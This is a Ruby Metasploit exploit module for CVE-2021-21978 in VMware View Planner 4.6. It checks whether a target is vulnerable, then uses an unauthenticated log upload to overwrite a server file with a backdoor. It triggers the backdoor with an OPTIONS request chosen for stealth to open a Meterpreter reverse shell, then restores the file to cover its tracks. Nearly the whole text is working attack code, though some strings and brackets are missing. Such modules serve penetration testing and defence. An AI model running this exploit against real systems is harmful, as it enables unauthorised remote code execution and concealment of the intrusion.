# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
        'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',
        'Description' => %q{
          This module exploits an unauthenticated log file upload within the
 file of VMWare View Planner 4.6 prior to 4.6
          Security Patch 1.

          Successful exploitation will result in RCE as the apache user inside
          the appacheServer Docker container.
        'Author' => [
          'Mikhail Klyuchnikov', # Discovery
          'wvu', # Analysis and PoC
          'Grant Willcox' # Metasploit Module
        'References' => [
          ['CVE', '2021-21978'],
          ['URL', ''],
          ['URL', ''] # wvu's PoC
        'DisclosureDate' => '2021-03-02', # Vendor advisory
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Platform' => 'python',
        'Targets' => [
            'VMware View Planner 4.6.0',
              'Arch' => ARCH_PYTHON,
              'Type' => :linux_command,
              'DefaultOptions' => {
                'PAYLOAD' => 'python/meterpreter/reverse_tcp'
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

      Opt::RPORT(443),'TARGETURI', [true, 'Base path', '/'])

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', '')

    unless res
      return CheckCode::Unknown('Target did not respond to check.')

    unless res.code == 200 && !res.body.empty?
      return CheckCode::Safe(' file not found at the expected location.')

    @original_content = res.body # If the server responded with the contents of, lets save this for later restoration.

    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
      return CheckCode::Safe("Target's file has been patched.")

    CheckCode::Appears('Vulnerable file identified!')

  # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
  # As the code for both is the same, minus the content of the file, this is a generic function to handle that.
  def upload_file(content)
    mime =
    mime.add_part(content, 'application/octet-stream', nil, "form-data; name=\"logfile\"; filename=\"#{Rex::Text.rand_text_alpha(20)}\"")
    mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":""}', nil, nil, 'form-data; name="logMetaData"')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'logupload'),
      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
      'data' => mime.to_s
    unless res.to_s.include?('File uploaded successfully.')
      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded successfully!")

  def exploit
    # Here we want to grab our template file, taken from a clean install but
    # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
    # with the payload we want to execute.
    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
    file_content =, ''))

    payload.encoded.gsub!(/"/, '\\"')
    file_content['PAYLOAD'] = payload.encoded

    # Now that things are primed, upload the file to the target.
    print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
    print_good('Backdoor uploaded!')

    # Use the OPTIONS request to trigger the backdoor. Technically this
    # could be any other method including invalid ones like BACKDOOR, but for
    # the purposes of stealth lets use a legitimate one.
    print_status('Sending request to execute the backdoor!')
      'method' => 'OPTIONS',
      'uri' => normalize_uri(target_uri.path, 'logupload')
    # At this point we should have our shell after waiting a few seconds,
    # so lets now restore the original file so we don't leave anything behind.
    print_status('Reuploading the original code to remove the backdoor!')
    print_good('Original file restored, enjoy the shell!')